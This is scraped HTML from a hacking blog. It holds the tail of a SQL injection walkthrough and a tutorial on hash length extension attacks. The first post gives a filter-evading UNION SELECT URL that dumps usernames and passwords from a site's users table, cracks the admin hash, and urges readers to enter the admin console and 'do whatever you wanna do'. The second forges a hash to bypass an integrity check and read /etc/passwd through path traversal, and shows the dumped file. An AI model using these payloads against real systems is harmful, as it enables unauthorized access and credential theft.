<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
I guess we
reached the 'orgasmic' point where the next step could lead you to a complete
different level. Imagine having a list of all the usernames and passwords at
your disposal and especially if you have the ADMIN creds. Well I am not saying
anything but you are intelligent enough to make use of it. So ready for your
final attempt? Here we GO</div>
<div class="ListParagraph" style="margin-bottom: 10.0pt; margin-left: 18.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l2 level1 lfo4; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-family: Calibri; mso-bidi-font-size: 11.0pt; mso-fareast-font-family: Calibri;">Step 3.<span style="font-size: 7pt; font-stretch: normal; font-weight: normal; line-height: normal;"> </span></span></b><!--[endif]--><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Extracting Data from 'username' & 'password' Columns<o:p></o:p></span></b><br />
<b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b>
<span style="text-align: start; text-indent: 0px;"><span style="color: white; font-family: Calibri; line-height: 15.3333px;"><a href="http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/*!50000gROup_cONcat(username,0x0a,%20password)*/+from+/*!50000users*/--+"> http://targetsite.com/demo/exams.php?sort=8+/*!50000union*/+/*!50000select*/+1,2,3,4,5,/*!50000gROup_cONcat(username,0x0a, password)*/+from+/*!50000users*/--+</a></span></span><br />
<b style="text-align: start; text-indent: 0px;"><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-P4emiY4_ARY/V2uZgvvwS_I/AAAAAAAAxeQ/-g1hnfD8bgY9XS6lO4BDXM1OXUFWPCl1ACKgB/s1600/11.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="370" src="https://1.bp.blogspot.com/-P4emiY4_ARY/V2uZgvvwS_I/AAAAAAAAxeQ/-g1hnfD8bgY9XS6lO4BDXM1OXUFWPCl1ACKgB/s640/11.jpg" width="640" /></a></div>
<b style="text-align: start; text-indent: 0px;"><br /></b></div>
<table border="1" cellpadding="0" cellspacing="0" class="MsoNormalTable" style="border-collapse: collapse; border: none; mso-border-alt: solid white 1.0pt; mso-border-insideh: .75pt solid white; mso-border-insidev: .75pt solid white; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 160;"><tbody>
</tbody></table>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<span lang="EN-GB"><!--[if gte vml 1]><v:shape id="Picture_x0020_18" o:spid="_x0000_i1035"
type="#_x0000_t75" alt="C:\Users\guhab\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\8.jpg"
style='width:540.75pt;height:327.75pt;visibility:visible'>
<v:imagedata src="file:///C:\Users\Bikram\AppData\Local\Temp\msohtml1\01\clip_image021.png"
o:title=""/>
<o:lock v:ext="edit" aspectratio="f"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]--></span><b><span style="font-size: 12.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><o:p></o:p></span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The data that I
am most interested in is:</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
'<b>admin</b>':'<b>9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684</b>'</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Looks like a
SHA-1 Hash which finally resolves to '<b>pass</b>'
once reversed. So the final value:<br />
<br /></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify;">
Username: <b>admin</b></div>
<div class="MsoNormal" style="text-align: justify;">
Password: <b>pass</b><br />
<b><br /></b></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt; text-align: justify;">
Do I need to tell you what to do next!! Just go
find the GOD DAMN admin console and do whatever you wanna do. My Job here is
done. See you again. Till then</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Hasta la vista<a href="https://www.blogger.com/null" name="_GoBack"></a><o:p></o:p></span></b><br />
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b></div>
</div>
</div>
Anonymoushttp://www.blogger.com/profile/16674553366705399324noreply@blogger.com2tag:blogger.com,1999:blog-2185986060583872831.post-40454352511693987512016-05-23T01:14:00.002-07:002016-05-23T01:16:03.049-07:00Secret Life of Hashes Divulged – Length Extension Attack Explained<div dir="ltr" style="text-align: left;" trbidi="on">
<div align="center" class="ListParagraph" style="line-height: 200%; margin-bottom: 10.0pt; margin-left: 0cm; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; text-align: center;">
</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div>
Sounds
interesting!! Doesn’t it? Well, it sounds to me and so I want it penned down.
Let’s see how this goes. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
If you feel
you’ve nailed it after reading through the entire blog, then I can consider
diving deep into the blogging world. It’s my second post within 24 hours and I
already feel I was born for it. Let’s not bore you guys with my shit, and learn
something about a new form of cryptographic attack called the Hash Length
Extension Attack, instead.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
It all started
when I was at Goa in India (an exotic place to be in for sure) a year ago for
the null conference. I know, when I say Goa, the only thought that comes to
your mind is the beaches – pristine blue with golden sand and perhaps a bottle
of Goa’s favorite chilled beer “Kings”.
The thought of not attending the conference crossed my mind, but then my
Boss gave me an intensive look and there I was, (‘Coz my employer paid for the
trip). I already knew that I was going to hate it but things changed at the
blink of an eye the moment I entered the conference. One of the trainings at
this conference was about an attack called a Hash Length Extension Attack. This
was the first time I've heard it and it kept me on my toes for the entire
session. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Half way down
the session, I realized that the attack is not only super awesomely cool, but
also conceptually easy to understand and perform. To make your job much easier,
there are various modules available over the internet such as <a href="https://github.com/bwall/HashPump">HashPump</a> and <a href="https://github.com/iagox86/hash_extender">hash_extender</a>. There’s
another module which I like personally, is the one from Stephen Bradshaw called
hlextend. This module can be found at <a href="https://github.com/stephenbradshaw/hlextend">GitHub</a>.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
As per
Wikipedia, the basic definition of this attack goes by: </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
“<i>In cryptography and computer security, a
length extension attack is a type of attack where an attacker can use Hash
(message1) and the length of message1 to calculate Hash (message1 </i><i><span style="font-family: "cambria math"; mso-bidi-font-family: "Cambria Math";">∥</span> message2). This attack can be
used to sign a message when a Merkle–Damgard based hash is misused as a message
authentication code, allowing for inclusion of extra information.<o:p></o:p></i></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<i>This attack can be done on hashes with
construction H (secret </i><i><span style="font-family: "cambria math"; mso-bidi-font-family: "Cambria Math";">∥</span>
message) when message and the length of secret is known. Algorithms like MD5,
SHA-1, and SHA-256 that are based on the Merkle–Damgard construction are
susceptible to this kind of attack.”<o:p></o:p></i></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Before we
begin, a quick go-through on how Hashing works:</div>
<div class="ListParagraphCxSpFirst" style="margin-top: 12.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Hash functions operate on fixed block sizes</div>
<div class="ListParagraphCxSpMiddle" style="margin-top: 12.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Input data is split into fix-sized parts equal
to the block size</div>
<div class="ListParagraphCxSpMiddle" style="margin-top: 12.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->If any of these parts is smaller than block size
(mostly the last part), the missing bytes are padded</div>
<div class="ListParagraphCxSpMiddle" style="margin-bottom: 10.0pt; margin-left: 54.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l1 level1 lfo2; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">ü<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->PKCS7</div>
<div class="ListParagraphCxSpMiddle" style="margin-bottom: 10.0pt; margin-left: 54.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l1 level1 lfo2; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">ü<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Bit Padding</div>
<div class="ListParagraphCxSpMiddle" style="margin-top: 12.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->The hash value represents the internal state of
the hash function</div>
<div class="ListParagraphCxSpLast" style="margin-bottom: 10.0pt; margin-left: 54.0pt; margin-right: 0cm; margin-top: 12.0pt; mso-add-space: auto; mso-list: l1 level1 lfo2; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">ü<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->You can simply continue adding data + padding
and hash again using the internal state</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">The Attack:<o:p></o:p></span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let’s assume a
web application which uses a known hash generated from an unknown secret value
tied to a user entered input. The basic purpose of doing so is to check the
integrity of the entered value to avoid any form of manipulation. For example,
let’s assume the desired SHA1 hash value generated with an unknown secret
length for a valid parameter value ‘<b>student</b>’
is ‘<b>204036A1EF6E7360E536300EA78C6AEB4A9333DD</b>’.
So, if we try to access the below mentioned URL, we get all the details of a
student. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-5OsqolFY8DE/V0K2XxcLjSI/AAAAAAAAxIY/FsIk4CW8X4klHeKn7YwE7UEnWg0nj5TQQCLcB/s1600/Link.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-5OsqolFY8DE/V0K2XxcLjSI/AAAAAAAAxIY/FsIk4CW8X4klHeKn7YwE7UEnWg0nj5TQQCLcB/s1600/Link.jpg" /></a></div>
<br /></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<!--[if gte vml 1]><v:shapetype
id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
<v:stroke joinstyle="miter"/>
<v:path gradientshapeok="t" o:connecttype="rect"/>
</v:shapetype><v:shape id="Text_x0020_Box_x0020_2" o:spid="_x0000_s1027"
type="#_x0000_t202" style='position:absolute;left:0;text-align:left;
margin-left:.75pt;margin-top:75.75pt;width:538.5pt;height:33.45pt;z-index:2;
visibility:visible;mso-wrap-distance-top:3.6pt;mso-wrap-distance-bottom:3.6pt;
mso-position-horizontal-relative:margin' fillcolor="#333">
<v:fill color2="black" rotate="t" focusposition=".5,.5" focussize="" focus="100%"
type="gradientRadial"/>
<v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
<v:textbox style='mso-fit-shape-to-text:t'>
<![if !mso]>
<table cellpadding=0 cellspacing=0 width="100%">
<tr>
<td><![endif]>
<div>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<b
style='mso-bidi-font-weight:normal'>Manipulated URL</b>:
http://127.0.0.1/index.php?param=<b style='mso-bidi-font-weight:normal'>/../../../../etc/passwd</b>&hash=
204036A1EF6E7360E536300EA78C6AEB4A9333DD </p>
</div>
<![if !mso]></td>
</tr>
</table>
<![endif]></v:textbox>
<w:wrap type="square" anchorx="margin"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]-->Cool! I guess that’s what the
application was supposed to do. <!--[if gte vml 1]><v:shape id="_x0000_s1026"
type="#_x0000_t202" style='position:absolute;left:0;text-align:left;
margin-left:.75pt;margin-top:.75pt;width:538.5pt;height:20.7pt;z-index:1;
visibility:visible;mso-wrap-distance-top:3.6pt;mso-wrap-distance-bottom:3.6pt;
mso-position-horizontal-relative:margin;mso-position-vertical-relative:text'
fillcolor="#333">
<v:fill color2="black" rotate="t" focusposition=".5,.5" focussize="" focus="100%"
type="gradientRadial"/>
<v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
<v:textbox style='mso-fit-shape-to-text:t'>
<![if !mso]>
<table cellpadding=0 cellspacing=0 width="100%">
<tr>
<td><![endif]>
<div>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<b
style='mso-bidi-font-weight:normal'>Valid URL</b>:
http://127.0.0.1/index.php?param=<b style='mso-bidi-font-weight:normal'>student</b>&hash=
204036A1EF6E7360E536300EA78C6AEB4A9333DD </p>
</div>
<![if !mso]></td>
</tr>
</table>
<![endif]></v:textbox>
<w:wrap type="square" anchorx="margin"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]-->It’s a valid request after all. Let’s see
what happens if we try to play with the <b>‘param’</b>
value. Let’s try to access the ‘<b>/etc/passwd/</b>’
file using path traversal. What do you think will happen?</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-qx-l5RfZQ8Q/V0K3CKWXhZI/AAAAAAAAxIc/sYUhNdgRa1g0pl_LC8WuJQg4CJwZhVFBwCLcB/s1600/Link2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://2.bp.blogspot.com/-qx-l5RfZQ8Q/V0K3CKWXhZI/AAAAAAAAxIc/sYUhNdgRa1g0pl_LC8WuJQg4CJwZhVFBwCLcB/s1600/Link2.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-SaE3jC3zkp4/V0K3X8SXB-I/AAAAAAAAxIg/W2G1ndnqFLEnKV-K_mzOQgpX3Jg8FFAdACLcB/s1600/1.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-SaE3jC3zkp4/V0K3X8SXB-I/AAAAAAAAxIg/W2G1ndnqFLEnKV-K_mzOQgpX3Jg8FFAdACLcB/s1600/1.jpg" /></a></div>
</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br /></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<br />
<br />
<br />
<br />
<br />
Oops!! File not
found. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Of course! And
did you think it was that easy? So what do you think happened? </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Well, the
requested file did not match the above SHA1 hash value since it belonged to ‘<b>student</b>’. In order to perform this
attack successfully, we would need a valid SHA1 hash value for the ‘<b>/../../../../etc/passwd</b>’ file, combined
with an unknown length of the secret value. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
And how do you
think we get that? Well, the first thing we need to do is to guess the length
of the secret value. Without which it won’t be possible to generate a valid
hash. In such cases, brute forcing the value by trying multiple different
lengths can sometimes be possible, depending on the application. </div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
Let’s first see
what all data we already have that might come in handy:</div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
Known Data: <b>student</b></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
Hash of known Data: <b>204036A1EF6E7360E536300EA78C6AEB4A9333DD</b></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
Extended Data: <b>/../../../../etc/passwd<o:p></o:p></b></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
Hash of Extended Data:<b>
<unknown><o:p></o:p></b></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
Length of secret:<b> <unknown><o:p></o:p></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Great!!</span><o:p></o:p></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
If I have to
explain it in simple words, the application creates a sha1 hash value of '<b>204036A1EF6E7360E536300EA78C6AEB4A9333DD</b>',
by concatenating an unknown secret of length ‘<b>X</b>’ and known data of '<b>student</b>'.
You wish to append the text '<b>/../../../../etc/passwd</b>'
after '<b>student</b>' and also provide a
valid hash back to the application that it will produce when it concatenates
your provided value (which will include the string '<b>student</b>' followed by '<b>/../../../../etc/passwd</b>')
with its secret.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
I hope by now
you already know what our ultimate goal is. Ready for some action!!! Here we
go……</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
The goal is to
read the <b>/etc/passwd</b> file, via
bypassing the hash integrity check on the param parameter. This is what the
script below will automate using the hlextend module to generate the extended
hash values.<a href="https://1.bp.blogspot.com/-iWtqPWjIVLQ/V0K6NN3VzmI/AAAAAAAAxIw/ckBXOUAKjQsCMPpMQxHt9AMKp91xERQGACLcB/s1600/2.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://1.bp.blogspot.com/-iWtqPWjIVLQ/V0K6NN3VzmI/AAAAAAAAxIw/ckBXOUAKjQsCMPpMQxHt9AMKp91xERQGACLcB/s1600/2.jpg" /></a></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">And the
output:</span><o:p></o:p></b><br />
<a href="https://2.bp.blogspot.com/-MGB-F6jlWu8/V0K6o20uaJI/AAAAAAAAxI0/FTIptr9Unys2fvTD_2Yardq1A2r7LEiHACLcB/s1600/3.jpg" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="https://2.bp.blogspot.com/-MGB-F6jlWu8/V0K6o20uaJI/AAAAAAAAxI0/FTIptr9Unys2fvTD_2Yardq1A2r7LEiHACLcB/s1600/3.jpg" /></a><br />
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;"><br /></span></b></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<!--[if gte vml 1]><v:shape
id="_x0000_s1031" type="#_x0000_t202" style='position:absolute;left:0;
text-align:left;margin-left:0;margin-top:78.55pt;width:533.25pt;height:320.25pt;
z-index:6;visibility:visible;mso-wrap-distance-top:3.6pt;
mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:left;
mso-position-horizontal-relative:margin' fillcolor="#999">
<v:fill color2="black" rotate="t" focusposition=".5,-52429f" focussize=""
colors="0 #cbcbcb;26214f #c3c3c3;1 black" focus="100%" type="gradientRadial"/>
<v:textbox>
<![if !mso]>
<table cellpadding=0 cellspacing=0 width="100%">
<tr>
<td><![endif]>
<div>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>root:x:0:0:root:/root:/bin/bash<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>daemon:x:1:1:daemon:/usr/sbin:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>bin:x:2:2:bin:/bin:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>sys:x:3:3:sys:/dev:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>sync:x:4:65534:sync:/bin:/bin/sync<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>games:x:5:60:games:/usr/games:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>man:x:6:12:man:/var/cache/man:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>lp:x:7:7:lp:/var/spool/lpd:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>mail:x:8:8:mail:/var/mail:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>news:x:9:9:news:/var/spool/news:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'> </span>proxy:x:13:13:proxy:/bin:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>www-data:x:33:33:www-data:/var/www:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>backup:x:34:34:backup:/var/backups:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>list:x:38:38:Mailing List Manager:/var/list:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>irc:x:39:39:ircd:/var/run/ircd:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>gnats:x:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>nobody:x:65534:65534:nobody:/nonexistent:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>libuuid:x:100:101::/var/lib/libuuid:/bin/sh<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>dhcp:x:101:102::/nonexistent:/bin/false<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>syslog:x:102:103::/home/syslog:/bin/false<o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><span style='mso-spacerun:yes'>
</span>klog:x:103:104::/home/klog:/bin/false</span><span style='color:#333333'><o:p></o:p></span></p>
<p class=MsoNormal style='margin-bottom:0cm;margin-bottom:.0001pt'>
<span
style='color:white'><o:p> </o:p></span></p>
</div>
<![if !mso]></td>
</tr>
</table>
<![endif]></v:textbox>
<w:wrap type="square" anchorx="margin"/>
</v:shape><![endif]--><!--[if !vml]--><!--[endif]-->Once we access the above displayed URL:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-uzR0SmGhDYo/V0K62dIUU1I/AAAAAAAAxI8/JsbZETVamRkH_W8VXVBwR9b7pDdiO_AowCLcB/s1600/4.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-uzR0SmGhDYo/V0K62dIUU1I/AAAAAAAAxI8/JsbZETVamRkH_W8VXVBwR9b7pDdiO_AowCLcB/s1600/4.jpg" /></a></div>
<br /></div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
You may notice
that the new value produced above contains a lot of additional data (in this
case, a 0x80 followed by a number of 0x00s and a message length, which is the
length of the key plus the original message, appended at the end) between the '<b>student</b>' and the '<b>/../../../../etc/passwd</b>' - this is hex encoded padding data used by
the hash algorithm that needs to be integrated into the hashed data in order
for the attack to work - S<a href="https://www.blogger.com/null" name="_GoBack"></a>o strictly speaking you can't
specify the EXACT value to append, only what comes after the padding, but under
the right circumstances you can make the application ignore this extra padding.</div>
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a 